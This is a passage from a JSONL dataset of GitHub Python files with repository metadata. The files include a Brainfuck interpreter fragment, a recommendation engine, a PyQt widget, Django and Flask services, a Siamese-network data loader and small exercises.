range(TAPE_LEN):\n print(\"{0}\\t{1}\\t{2}\".format(i, TAPE[i], [\"<---\" if i == TAPE_POINTER else \"\"][0]))\n input(\"Press enter to continue execution\")\n\n# ---------------------------------------------------- #\n\nif len(sys.argv) < 2:\n print(\"Specify the file to execute as parameter\")\n exit()\n\nwith open(sys.argv[1]) as program:\n CODE = list(filter(lambda ch: ch in \"+-<>[].,@\", program.read()))\n\ncodeLength = len(CODE)\nwhile CODE_POINTER < codeLength:\n ch = CODE[CODE_POINTER]\n OPCODES[ch]()\n CODE_POINTER += 1\n","repo_name":"FiorixF1/brainphuck","sub_path":"brainphuck.py","file_name":"brainphuck.py","file_ext":"py","file_size_in_byte":2932,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"72405086507","text":"import operator\nimport pandas as pd\nimport numpy as np\nfrom collections import OrderedDict\nimport time\n\n\ndef weight_matrix(student_id, LO_Count_pivot):\n # LO_Count=pd.read_csv('GroupdData.json')\n \"\"\"\n Input : Takes as arguments each student id and the Group data json file (which contains the count of LOs for each student)\n Output:\n Return Weight_Matrix, which contains the weight of each LO corresponding to the respective students.\n \"\"\"\n LO_weight = np.array(LO_Count_pivot.iloc[student_id, :].dropna(axis=0)) # weight corresponding to each student\n return LO_weight\n\n\ndef Similarity_Matrix(pickle_file):\n \"\"\"\n Input : Takes a pickle file, which holds the precomputed similarity matrix.\n Output: Return the similarity matrix corresponding to each LO.\n\n \"\"\"\n pickle1 = pd.read_pickle(pickle_file)\n Utility_data = pd.DataFrame(pickle1)\n a = list(Utility_data)\n Similarity_matrix = pd.DataFrame.from_dict(pickle1, orient='index', dtype=None)\n Similarity_matrix.columns = a\n return Similarity_matrix\n\n\ndef rating_recommendation_with_dict(top_recom, df, LO_Count_file):\n \"\"\"\n Input : Takes the number of items to be recommended, dataframe df of students & LOs and the LOs count json file for each student\n Output: Return a list of all possible recommendations corresponding to each student.\n\n \"\"\"\n\n # LO_Count=pd.read_csv(\"GroupdData.json\")\n LO_Count = pd.read_csv(LO_Count_file)\n LO_list = LO_Count['object.definition.name.de-DE'].unique()\n LO_ID = ['LO_' + str(x) for x in range(len(LO_list))]\n zip(LO_ID, LO_list)  # note: this bare zip() has no effect; the pairing is rebuilt just below\n dict_List = {}\n for k, v in zip(LO_list, LO_ID):\n dict_List[k] = v\n LO_Count['LO'] = 
LO_Count['object.definition.name.de-DE'].apply(lambda x: dict_List[x])\n LO_Count_pivot = LO_Count.pivot(index='actor.name', columns='LO', values='count')\n # LO_Count_pivot.head()\n ratings = []\n Similarity_matrix = Similarity_Matrix('dictionary.pickle') # Get similarity matrix for item to item\n rat1 = {}\n ratings1 = []\n for i in range(0, df.shape[0]): # Loop Till number of Students\n stu_data_index = df.iloc[[i]] # get each of Student data\n not_done = list(stu_data_index.columns[stu_data_index.isnull().any()]) # Find LOs not done by Student\n done = list(stu_data_index.dropna(axis=1)) # Get LOs done by the student\n rat, list1 = [], []\n rat1 = {}\n for k in range(0, len(not_done)):\n df_weight = weight_matrix(i, LO_Count_pivot) # Weight matrix for each student\n similarity_student = np.array(Similarity_matrix.loc[not_done[k], done])\n rat1[(similarity_student.dot(df_weight.T)) / similarity_student.sum()] = not_done[k]\n od = OrderedDict(sorted(rat1.items(), reverse=True)[:top_recom])\n ratings1.append(od)\n return ratings1\n\n\ndef recommendation():\n \"\"\"\n Input :\n Output: It returns a list of top-N recommendations\n \"\"\"\n df= pd.read_csv('df_Student_User') #read Student and LOs data corresponding to each in dataframe df\n df.set_index('StudentID',inplace=True) #Set index of df as StudentID\n t = time.perf_counter()  # time.clock() was removed in Python 3.8\n rating_dictionary = rating_recommendation_with_dict(5,df,'GroupdData.json')\n print(time.perf_counter() - t)\n print(\"rating matrix length= \"+str(len(rating_dictionary)))\n rating_dict_final={}\n for i in range(0,len(rating_dictionary)):\n rating_dict_final[df.index[i]]=rating_dictionary[i] #Storing top-N recommendation in dict\n return rating_dict_final\n\n\nif __name__ == '__main__':\n recommendation()","repo_name":"grv1207/EasyLearningNOSQL","sub_path":"RecommendationEngine/TimeAwareRecommendation.py","file_name":"TimeAwareRecommendation.py","file_ext":"py","file_size_in_byte":3597,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"11513230475","text":"import re\nimport openai\nimport os\nfrom dotenv import load_dotenv\n\nload_dotenv()\n\n# set up OpenAI API\nopenai.api_key = os.environ.get('open_ai_api_key')\n\n\n# define function to read document\ndef read_document(filepath):\n with open(filepath, \"r\", encoding=\"utf8\", errors='ignore') as file:\n document = file.read()\n return document\n\n\n# define function to answer user queries\ndef answer_query(document, query):\n # preprocess query\n query = query.lower()\n query = re.sub(r'[^\\w\\s]', '', query)\n query = re.sub(r'\\d+', '', query)\n # generate response from ChatGPT\n response = openai.Completion.create(\n engine=\"text-davinci-003\", # List of models: https://platform.openai.com/docs/models\n prompt=document + \"\\nQuery: \" + query + \"\\nAnswer:\",\n max_tokens=1024,\n n=1,\n stop=None,\n temperature=0.5,\n )\n # extract answer from response\n answer = response.choices[0].text.strip()\n # return answer\n return answer\n\n\n# example usage\nfilepath = \"jokes.txt\" # place file in same directory as main.py\ndocument = read_document(filepath)\n\nquery = \"Summarize this document\" # Your prompt for what you want to do with the file\nanswer = answer_query(document, query)\nprint(answer)\n","repo_name":"marjan2k/gpt4FileReader","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1248,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} 
+{"seq_id":"15349652077","text":"#!/usr/bin/env python3\n\nfrom PyQt5.QtWidgets import QWidget, QLabel, QBoxLayout, QComboBox, QPushButton, QFormLayout\n\nimport style.style_loader\nimport view.notifier\nfrom model.tournament_organizer import to\n\nclass RemovePlayerWidget(QWidget):\n\tdef __init__(self):\n\t\tsuper(RemovePlayerWidget, self).__init__()\n\t\t# self.setWindowTitle('Remove Player')\n\t\tself.setStyleSheet(style.style_loader.stylesheet)\n\n\t\tself.label = QLabel('Enter Name:', self)\n\n\t\tself.label_widget = QWidget(self)\n\t\tlabel_layout = QBoxLayout(QBoxLayout.LeftToRight)\n\t\tlabel_layout.addWidget(self.label)\n\t\tself.label_widget.setLayout(label_layout)\n\n\t\tself.name_box = QComboBox(self)\n\t\tself.name_box.setFixedWidth(210)\n\t\tself.name_box.setFixedHeight(50)\n\n\t\tself.name_box_widget = QWidget(self)\n\t\tname_box_layout = QBoxLayout(QBoxLayout.LeftToRight)\n\t\tname_box_layout.addWidget(self.name_box)\n\t\tself.name_box_widget.setLayout(name_box_layout)\n\n\t\tself.submit_btn = QPushButton('Remove Player', self)\n\t\tself.submit_btn.clicked.connect(self.submit)\n\n\t\tself.submit_btn_widget = QWidget(self)\n\t\tsubmit_btn_layout = QBoxLayout(QBoxLayout.LeftToRight)\n\t\tsubmit_btn_layout.addWidget(self.submit_btn)\n\t\tself.submit_btn_widget.setLayout(submit_btn_layout)\n\n\t\tlayout = QFormLayout()\n\t\tlayout.addRow(self.label_widget)\n\t\tlayout.addRow(self.name_box_widget)\n\t\tlayout.addRow(self.submit_btn_widget)\n\t\tself.setLayout(layout)\n\n\t\tself.show()\n\t\tself.setFixedHeight(self.height())\n\t\tself.setFixedWidth(self.width())\n\t\tself.close()\n\n\tdef update(self):\n\t\tself.name_box.clear()\n\t\tfor name in to.sorted_players(method='by_name'):\n\t\t\tself.name_box.addItem(name)\n\n\tdef submit(self):\n\t\tview.notifier.player_removed(str(self.name_box.itemText(self.name_box.currentIndex())))\n\t\tself.name_box.clear()\n\t\tself.close()\n","repo_name":"zlohner/TournamentOrganizer","sub_path":"view/remove_player_widget.py","file_name":"remove_player_widget.py","file_ext":"py","file_size_in_byte":1753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"42938415655","text":"from django.shortcuts import render\nfrom django.http import HttpResponse\nfrom .models import Machine\n\n\ndef values_endpoint(request):\n \"\"\"Receive values, store them to database\"\"\"\n\n id_ = request.GET.get('id')\n machine_number = request.GET.get('num')\n status = request.GET.get('status')\n\n print(f\"id: {id_}, machine_number: {machine_number}, status: {status}\")\n\n machine_object = Machine.objects.create(\n machine_id=id_,\n machine_number=machine_number,\n status=status\n )\n \n machine_object.save()\n \n return HttpResponse(\"OK\")\n\n\ndef table_view(request):\n \"\"\"Get values from database and generate table\"\"\"\n\n \n machine_object = Machine.objects.all().order_by('-id')\n machine_object = list(machine_object)\n\n context = {\n 'table_data': machine_object,\n }\n\n return render(request, 'table_app/table.html', context)\n","repo_name":"ArkFreestyle/faizan_table","sub_path":"table_app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":892,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"3619683806","text":"#!/usr/bin/python\nimport os\nimport sys\nimport glob\nfrom string import atof\n\nbenchmarkpos = [8,2,4,16,55,7,53,18,15,17,19,42]\ninfile = open('data/Hit2result','r')\nphash = {}\nphash_A = {}\nfor line in 
infile.xreadlines():\n if 'Mut' in line: continue\n line = line.rstrip().rsplit(\"\\t\")\n mut = line[0]\n fit = line[-1]\n pos = int(mut[1:-1])+1\n aa = mut[-1]\n wta = mut[0]\n if pos in benchmarkpos: \n phash[str(pos)+aa] = atof(fit)\n phash[str(pos)+wta] = atof(0)\n if aa == 'A':\n phash_A[str(pos)] = atof(fit)\ninfile.close()\n\naas = ['E','D','R','K','H','Q','N','S','T','P','G','C','A','V','I','L','M','F','Y','W']\noutfile = open('data/BetaBenchMark','w')\noutfile.write('aa'+\"\\t\"+\"\\t\".join(map(str,benchmarkpos))+\"\\n\")\nfor aa in aas:\n outfile.write(aa)\n for pos in benchmarkpos:\n pos = str(pos)\n outfile.write(\"\\t\"+str(phash[pos+aa]-phash_A[pos]))\n outfile.write(\"\\n\")\noutfile.close()\n","repo_name":"wchnicholas/DoubleMutFit2DDG","sub_path":"script/Analyze7.py","file_name":"Analyze7.py","file_ext":"py","file_size_in_byte":908,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"74234695146","text":"from collections import namedtuple\nfrom heur import *\n\nPoint = namedtuple(\"Point\", [\"row\", \"column\"])\n\n\nclass Vehicle:\n def __init__(self):\n self.initial_pos = Point(0,0)\n self.scheduled_rides = []\n self.unavailable_until = 0\n self.id = None\n self.never_possible = False\n self.wagi =[]\n self.current_pos = self.initial_pos\n\n\nclass Ride:\n def __init__(self, id, start_pos, end_pos, earliest_start, latest_finish):\n self.id = id\n self.start_pos = start_pos\n self.end_pos = end_pos\n self.earliest_start = earliest_start\n self.latest_finish = latest_finish\n self.available = True\n self.wage = None\n\n\nclass Simulator:\n def __init__(self, vehicles, rides, bonus, steps):\n self.vehicles = vehicles\n self.rides = rides\n self.bonus = bonus\n self.steps = steps\n\n def RidesWages(self):\n for ride in self.rides:\n mins =[]\n for ride2 in self.rides:\n if ride.id != ride2.id:\n mins.append(abs(ride.end_pos.row - ride2.start_pos.row) + abs(ride.end_pos.column - ride2.start_pos.column))\n ride.wage = min(mins)\n print(ride.id, ride.wage)\n\n def daniel_simulate(self):\n score = 0\n step = 0\n self.RidesWages()\n while step < self.steps:\n\n if GetAllAvailableVehicles(self.vehicles,step) == []:\n possibleDate = GetDateOfNextAvailable(self.vehicles)\n if possibleDate: step = possibleDate\n else: return score\n\n print(step, 'score:',score)\n\n for vehicle in self.vehicles:\n vehicle.wagi = []\n if vehicle.unavailable_until <= step:\n for ride in self.rides:\n if ride.available:\n if IsRidePossible(\n vehicle.current_pos.row, vehicle.current_pos.column,\n ride.start_pos.row, ride.start_pos.column, \n ride.end_pos.row, ride.end_pos.column,\n ride.latest_finish, step):\n\n pts, realpoints, finish_time_ride = CalculatePoints(\n ride.start_pos.row, ride.start_pos.column,\n ride.end_pos.row, ride.end_pos.column,\n vehicle.current_pos.row, vehicle.current_pos.column,\n step, ride.earliest_start,self.bonus,ride.wage,step, ride.id,score)\n vehicle.wagi.append({'id':ride.id, 'pts':pts, 'realpts':realpoints,'finish':finish_time_ride})\n \n max_ride = max(vehicle.wagi, key=lambda it: it['pts'], default=None)\n if max_ride:\n picked_ride = self.rides[max_ride['id']]\n score += max_ride['realpts']\n print('assigned', picked_ride.id)\n vehicle.scheduled_rides.append(picked_ride)\n picked_ride.available = False\n vehicle.unavailable_until = max_ride['finish']\n vehicle.current_pos= Point(picked_ride.end_pos.row, picked_ride.end_pos.column)\n else: vehicle.never_possible = True\n\n step+=1\n return 
score\n\n","repo_name":"NieeFlatmap/2018-self-driving-cars","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":3478,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"19224239152","text":"import pandas as pd\nimport numpy as np\nlst = {\"10,33\",\"30,33\"}\nprint(lst)\ndf = pd.DataFrame(lst)\n\n# print(df.iloc[:])\n# print(df.iloc[:,0])\n\ndf.iloc[:,0] = df.iloc[:,0].str.replace(',','')\nprint(df)","repo_name":"Arwen0905/Python_Test","sub_path":"TQC_考題練習_第二類/a0720_replace_排除數字逗號.py","file_name":"a0720_replace_排除數字逗號.py","file_ext":"py","file_size_in_byte":198,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"14443272628","text":"import random\nfrom random import Random\nimport constant as const\n\nimport numpy as np\nimport torch\nimport cv2\nfrom torch.utils.data import DataLoader, Dataset\nfrom torchvision import datasets as dset\nimport torchvision.transforms as T\n\n\ndef get_train_validation_loader():\n train_dataset = dset.ImageFolder(root='./flatfish_train')\n val_dataset = dset.ImageFolder(root='./flatfish_val')\n\n train_dataset = FlatfishTrain(train_dataset, num_train=const.NUM_TRAIN)\n # val_dataset = FlatfishTrain(val_dataset, num_train=const.NUM_VAL)\n val_dataset = FlatfishTest(val_dataset)\n\n train_loader = DataLoader(train_dataset, batch_size=const.BATCH_SIZE, shuffle=True)\n val_loader = DataLoader(val_dataset, batch_size=const.BATCH_SIZE, shuffle=True)\n\n return train_loader, val_loader\n\ndef get_test_loader():\n test_dataset = dset.ImageFolder(root='./flatfish_test')\n\n test_dataset = FlatfishTest(test_dataset)\n # test_dataset = FlatfishTrain(test_dataset, num_train=const.NUM_TEST)\n\n test_loader = DataLoader(test_dataset, batch_size=const.BATCH_SIZE, shuffle=True)\n\n return test_loader\n\nclass FlatfishTrain(Dataset):\n def __init__(self, dataset, num_train):\n self.dataset = dataset\n self.num_train = num_train\n\n def __len__(self):\n return self.num_train\n\n def __getitem__(self, index):\n # Get image from same class\n # : 홀수번째 데이터는 같은 클래스의 이미지\n if index % 2 == 1:\n # 같으면 Label=1\n label = 1.0\n # ['sea', 'farm'] 중 랜덤으로 하나 선택 (0:farm / 1:sea)\n idx = random.randint(0, len(self.dataset.classes) - 1)\n # 선택한 class의 이미지 데이터(주소) 리스트\n image_list = [x for x in self.dataset.imgs if x[1] == idx]\n # 선택한 class의 이미지 리스트 중 2개의 이미지 선택\n image1 = random.choice(image_list)\n image2 = random.choice(image_list)\n # *2개의 이미지가 같으면 두번째 이미지를 다시 선택\n while image1[0] == image2[0]:\n image2 = random.choice(image_list)\n\n # Get image from different class\n # : 짝수번째 데이터는 다른 클래스의 이미지\n else:\n # 다르면 Label=0\n label = 0.0\n # 랜덤으로 2개의 이미지 선택\n image1 = random.choice(self.dataset.imgs)\n image2 = random.choice(self.dataset.imgs)\n # *2개의 이미지의 레이블이 같으면 두번째 이미지를 다시 선택\n while image1[1] == image2[1]:\n image2 = random.choice(self.dataset.imgs)\n\n # 이미지를 넘파이 형태로 로드 후 Tensor로 변환 및 1@105x105사이즈로 resize\n image1 = cv2.imread(image1[0], cv2.IMREAD_GRAYSCALE)\n image2 = cv2.imread(image2[0], cv2.IMREAD_GRAYSCALE)\n label = torch.from_numpy(np.array(label, dtype=np.float32))\n\n image1 = torch.tensor(image1).resize(1, 105, 105).type(torch.FloatTensor)\n image2 = torch.tensor(image2).resize(1, 105, 105).type(torch.FloatTensor)\n label = torch.tensor(label)\n\n return image1, image2, label\n\nclass FlatfishTest:\n def __init__(self, dataset, trials=2, way=4, seed=0):\n self.dataset = dataset\n self.trials = trials\n self.way = way\n self.seed = 
seed\n self.num_test = len(dataset)*2\n # self.image1 = None\n\n def __len__(self):\n # return self.trials * self.way\n return self.num_test\n\n def __getitem__(self, index):\n rand = Random(self.seed + index)\n # get image pair from same class\n if index < len(self.dataset):\n image1 = self.dataset.imgs[0]\n image2 = self.dataset.imgs[index]\n else:\n image1 = self.dataset.imgs[5]\n image2 = self.dataset.imgs[index - len(self.dataset)]\n\n if image1[1]==image2[1]:\n label = 1.0\n else:\n label = 0.0\n\n # if index % self.way == 0:\n # label = 1.0\n # idx = rand.randint(0, len(self.dataset.classes) - 1)\n # image_list = [x for x in self.dataset.imgs if x[1] == idx]\n # self.image1 = rand.choice(image_list)\n # image2 = rand.choice(image_list)\n # while self.image1[0] == image2[0]:\n # image2 = rand.choice(image_list)\n\n # # get image pair from different class\n # else:\n # label = 0.0\n # image2 = random.choice(self.dataset.imgs)\n # while self.image1[1] == image2[1]:\n # image2 = random.choice(self.dataset.imgs)\n \n image1 = cv2.imread(image1[0], cv2.IMREAD_GRAYSCALE)\n image2 = cv2.imread(image2[0], cv2.IMREAD_GRAYSCALE)\n label = torch.from_numpy(np.array(label, dtype=np.float32))\n\n image1 = torch.tensor(image1).resize(1, 105, 105).type(torch.FloatTensor)\n image2 = torch.tensor(image2).resize(1, 105, 105).type(torch.FloatTensor)\n label = torch.tensor(label)\n\n return image1, image2, label\n\nif __name__=='__main__':\n # train, val = get_train_validation_loader()\n # test = get_test_loader()\n\n # print(len(train.dataset))\n # print(len(val.dataset))\n # print(len(test.dataset))\n\n # print(train.dataset.dataset.classes)\n\n # val_dataset = dset.ImageFolder(root='/Users/hyojin/Fish_Siamese/hyojin2/flatfish_val')\n # val_dataset = FlatfishTrain(val_dataset, num_train=25)\n # img = cv2.imread(train_dataset.imgs[0][0], cv2.IMREAD_GRAYSCALE)\n # img = torch.tensor(img).resize(1, 105, 105)\n # print(img)\n # print(val_dataset[-1])\n testloader = get_test_loader()\n print(len(testloader.dataset))","repo_name":"JONHYOJIN/Fish_Siamese_hyojin","sub_path":"hyojin2/data_loader.py","file_name":"data_loader.py","file_ext":"py","file_size_in_byte":5781,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"4207214621","text":"from gevent import monkey\nmonkey.patch_all()\n\nimport signal\nimport os\nimport requests\n\nfrom ping3 import ping\nfrom flask import Flask, send_file\nfrom werkzeug.utils import secure_filename\nfrom flask_restful import Api, Resource, reqparse, request\nfrom pony.orm import db_session\n\nimport gevent\n\nfrom utilities.models import User, Printing\nfrom utilities.config import config\n\nimport logging\nlog = logging.getLogger('werkzeug')\nlog.setLevel(logging.ERROR)\n\napp = Flask(__name__)\napi = Api(app)\n\napp.config['MAX_CONTENT_LENGTH'] = 16 * 1000 * 1000\napp.config['UPLOAD_FOLDER'] = os.path.join('data', 'uploads')\n\n@app.route('/')\ndef default():\n return 'Hello, World!'\n\n\ndef rpc_method_user(method):\n method.rpc = True\n method.permission = 'user'\n return method\n\n\n@api.resource('/login')\nclass UserLogin(Resource):\n def __init__(self):\n super().__init__()\n self.parser = reqparse.RequestParser()\n self.parser.add_argument('username', location='form')\n self.parser.add_argument('password', location='form')\n\n @db_session\n def post(self):\n # Get username and password from request\n args = self.parser.parse_args()\n username = args['username'] or \"\"\n password = args['password'] or \"\"\n 
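# fetch the matching account via Pony ORM; .first() returns the User entity or None when the username is unknown\n        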
user = User.select(lambda u: u.username == username).first()\n\n if not user:\n return {'error': 'User not found'}, 404\n elif not user.verify_password(password):\n return {'error': 'Incorrect password'}, 401\n elif not os.path.exists(os.path.join('data', 'configs', f'{username}.conf')):\n return {'error': 'User configuration not found'}, 404\n\n # TODO: Return VPN configurations\n return send_file(os.path.join('..', '..', 'data', 'configs', f'{username}.conf'))\n\n\n@api.resource('/print')\nclass Print(Resource):\n @db_session\n def post(self):\n ip = request.remote_addr\n user = User.select(lambda u: u.ip_address == ip).first()\n if not user:\n return {'error': 'User not found'}, 404\n\n file = request.files['file']\n if file.filename == '':\n return {'error': 'No file selected'}, 400\n\n if file:\n filename = f'{user.username}_{secure_filename(file.filename)}'\n file.save(os.path.join(app.config['UPLOAD_FOLDER'], filename))\n Printing(caller=user, source=filename)\n service_address = config['services']['PrintingService'][0]\n r = requests.post(f'http://{service_address[0]}:{service_address[1]}/print',\n files={'file': open(os.path.join(app.config['UPLOAD_FOLDER'], filename), 'rb')}, timeout=5)\n return {'success': True}, 200\n else:\n return {'error': 'No file selected'}, 400\n\n\n@api.resource('/performance')\nclass Performance(Resource):\n def __init__(self):\n super().__init__()\n self.parser = reqparse.RequestParser()\n self.parser.add_argument('cpu', location='form')\n self.parser.add_argument('mem', location='form')\n\n @db_session\n def post(self):\n ip = request.remote_addr\n user = User.select(lambda u: u.ip_address == ip).first()\n if not user:\n return {'error': 'User not found'}, 404\n\n args = self.parser.parse_args()\n cpu = args['cpu'] or \"\"\n mem = args['mem'] or \"\"\n user.cpu = cpu\n user.ram = mem\n return {'success': True}, 200\n\n\ndef ping_users():\n while True:\n with db_session:\n users = User.select()\n batch_size = 5\n batch = []\n for i in range(0, len(users), batch_size):\n # Create a gevnet batch\n batch.append(gevent.spawn(ping_batch, users[i:i + batch_size]))\n gevent.joinall(batch)\n print(\"DONE\")\n\n\ndef ping_batch(batch):\n with db_session:\n for user in batch:\n try:\n ping_ = ping(user.ip_address)\n except:\n ping_ = False\n if not ping_:\n user.is_online = False\n user.ping = -1.0\n else:\n user.is_online = True\n user.ping = round(ping_ * 1000.0, 2)\n\n\n@api.resource('/user/')\nclass UserInfo(Resource):\n def __init__(self):\n super().__init__()\n\n def get(self, username):\n with db_session:\n user = User.select(lambda u: u.username == username).first()\n if not user:\n return {'error': 'User not found'}, 404\n return {'username': user.username, 'ip_address': user.ip_address, 'is_online': user.is_online}, 200\n\n\ndef exit():\n os._exit(0)\n\n\nping_thread = None\ngevent.signal_handler(signal.SIGINT, exit)\n\ndef main():\n global ping_thread\n ping_thread = gevent.spawn(ping_users)\n","repo_name":"VNOI-Admin/utilities","sub_path":"utilities/services/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":4831,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"17741632201","text":"# Diseñar 3 funciones:\r\n#\r\n# 1. Leer un número de 4 dígitos, mostrar el dígito mayor e informar si es par o impar. #!SOLUCIONADO!\r\n# 2. Leer dos números de 3 dígitos cada uno, formar un tercer número con el mayor del primero y el menor del segundo. #!SOLUCIONADO!\r\n# 3. 
Leer un número de 3 dígitos y formar el mayor número posible con sus cifras.#!SOLUCIONADO\r\n#\r\n# Crea la función principal como un menú con las tres opciones.\r\n\r\ndef menu():\r\n while True:\r\n decision = int(input(\"**** Hola! ingrese en el menú, la opción que quiere realizar ****\\n1.Mostrar mayor par/impar\\n2.seleccione el mayor de los dos numeros\\n3.Ordenar por mayor\\n4.Salir\\n\"))\r\n if decision == 1:\r\n funcion1()\r\n if decision == 2:\r\n funcion2()\r\n if decision == 3:\r\n funcion3()\r\n if decision == 4:\r\n break\r\n\r\ndef funcion1():\r\n numeros=[]\r\n i=0\r\n for i in range(4):\r\n num = float(input(\"Ingerse el numero #{}: \".format(i+1))) #captura los numeros\r\n numeros.append(num) #*Append agrega los # al array\r\n mayor = numeros[0] #*Se le asigna como mayor al primer valor de la lista\r\n for numero in numeros: #se recorre la lista | for in :\r\n if numero > mayor:\r\n mayor = numero\r\n if mayor % 2 == 0:\r\n print(\"El digito Mayor es: \",mayor,\", y el numero es par\")\r\n else:\r\n print(\"El digito Mayor es: \",mayor,\", y el numero es impar\")\r\n\r\ndef funcion2():\r\n numeros=[]\r\n i=0\r\n for i in range(3):#3 digitos, cuenta de 0 a 3\r\n num = float(input(\"Ingerse el numero #{}: \".format(i+1))) #captura los numeros\r\n numeros.append(num) #*Append agrega los # al array\r\n mayor = numeros[0] #*Se le asigna como mayor al primer valor de la lista\r\n menor = numeros[0] #*Se le asigna como mayor al primer valor de la lista\r\n for numero in numeros: #se recorre la lista | for in :\r\n if numero > mayor:\r\n mayor = numero\r\n for numero in numeros: #se recorre la lista | for in :\r\n if numero < menor:\r\n menor = numero\r\n print(f\"El numero mayor es {mayor}, el numero menor es {menor} y juntos son: %i%i\" % (mayor,menor))\r\n\r\ndef funcion3():\r\n numeros=[]\r\n ordenados=[]\r\n i=0\r\n for i in range(3):#3 digitos, cuenta de 0 a 3\r\n num = float(input(\"Ingerse el numero #{}: \".format(i+1))) #captura los numeros\r\n numeros.append(num) #*Append agrega los # al array\r\n ordenados = sorted(numeros, reverse=True)\r\n print(\"El mayor numero posible es %i%i%i\" % (ordenados[0],ordenados[1],ordenados[2]))\r\n\r\nif __name__ == \"__main__\":\r\n menu()\r\n\r\n","repo_name":"paradahuninorte/MisionTIC","sub_path":"Ciclo 1/Componente Practico/Tema 2/sesion6/sesion6.py","file_name":"sesion6.py","file_ext":"py","file_size_in_byte":2704,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"17753247621","text":"import matplotlib.pyplot as plt\nfrom scipy.io import wavfile\nimport os\nfrom pydub import AudioSegment\n\n# Calculate and plot spectrogram for a wav audio file\ndef gen_spectrogram(wav_file):\n\n rate, data = wavfile.read(wav_file)\n\n nfft = 200 # Length of each window segment\n fs = 8000 # Sampling frequencies\n noverlap = 120 # Overlap between windows\n\n nchannels = data.ndim\n\n if nchannels == 1:\n pxx, freqs, bins, im = plt.specgram(data, nfft, fs, noverlap = noverlap)\n elif nchannels == 2:\n pxx, freqs, bins, im = plt.specgram(data[:,0], nfft, fs, noverlap = noverlap)\n return pxx\n\n# Load raw audio files for speech synthesis\ndef load_raw_audio():\n\n trigger_words = []\n backgrounds = []\n non_trigger_words = []\n\n for filename in os.listdir(\"./data/raw/trigger_words\"):\n if filename.endswith(\"wav\"):\n trigger_word = AudioSegment.from_wav(\"./data/raw/trigger_words/\"+filename)\n trigger_words.append(trigger_word)\n\n for filename in 
os.listdir(\"./data/raw/backgrounds\"):\n if filename.endswith(\"wav\"):\n background = AudioSegment.from_wav(\"./data/raw/backgrounds/\"+filename)\n backgrounds.append(background)\n\n for filename in os.listdir(\"./data/raw/non_trigger_words\"):\n if filename.endswith(\"wav\"):\n non_trigger_word = AudioSegment.from_wav(\"./data/raw/non_trigger_words/\"+filename)\n non_trigger_words.append(non_trigger_word)\n\n return trigger_words, non_trigger_words, backgrounds\n","repo_name":"shbv/natural_language_processing","sub_path":"trigger_word_detection/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1521,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"16864950598","text":"from typing import List\nfrom CreateTree import TreeNode\n\nclass Solution:\n def isUnivalTree(self, root: TreeNode) -> bool:\n # 前序遍历\n if not root:\n return False\n self.val = root.val\n self.flag = True\n def preorder(root: TreeNode):\n if not root:\n return\n if self.flag == False: # 已经找到不一样的值, 无需再递归了\n return\n if root.val != self.val: # 找到不一样的值, 改变flag\n self.flag = False\n return\n preorder(root.left)\n preorder(root.right)\n\n preorder(root)\n return self.flag","repo_name":"tangxyw/LeetCode","sub_path":"python/BinaryTree/[965]单值二叉树.py","file_name":"[965]单值二叉树.py","file_ext":"py","file_size_in_byte":686,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"9967911650","text":"'''386. Lexicographical Numbers\nGiven an integer n, return all the numbers in the range [1, n] sorted in lexicographical order.\nYou must write an algorithm that runs in O(n) time and uses O(1) extra space.\nExample 1:\n\nInput: n = 13\nOutput: [1,10,11,12,13,2,3,4,5,6,7,8,9]\nExample 2:\n\nInput: n = 2\nOutput: [1,2]\n'''\nnum=int(input(\"enter max number:\"))\nlist1=[x for x in range(1,num)]\nlst2=[]\nfor i in list1:\n b=str(i)\n lst2.append(b)\nlst2=sorted(lst2)\n\nlst3=[]\nfor j in lst2:\n c=int(j)\n lst3.append(c)\nprint(f'Lexicographical Numbers:\\n{lst3}')","repo_name":"SACHINKV14/MCS_00_Sachin_Core_Python","sub_path":"practice 04 Dec/harsha_tasks/_30_dec/standout_30_dec.py","file_name":"standout_30_dec.py","file_ext":"py","file_size_in_byte":555,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"73097585068","text":"def anagram(str1, str2):\n str1_list = list(str1)\n str1_list.sort()\n\n str2_list = list(str2)\n str2_list.sort()\n\n return str1_list == str2_list\n\n\nif anagram(input(), input()):\n print('YES')\nelse:\n print('NO')","repo_name":"Coobeliues/pp2_py","sub_path":"pract/pr2/n.py","file_name":"n.py","file_ext":"py","file_size_in_byte":227,"program_lang":"python","lang":"de","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"11057913098","text":"import json\nimport datetime\nimport argparse\nimport time\n\nimport apache_beam as beam\nfrom apache_beam.io import ReadFromText\nfrom apache_beam.io import WriteToBigQuery, WriteToText\nfrom apache_beam.metrics import Metrics\nfrom apache_beam.metrics.metric import MetricsFilter\nfrom apache_beam.io.gcp.bigquery import parse_table_schema_from_json\nfrom multiprocessing.dummy import Pool\n\nfrom pardo.parse_row_ndjson import ParseRowNdjsonFn\nfrom pardo.validate_row import ValidateRowFn\n\ndef 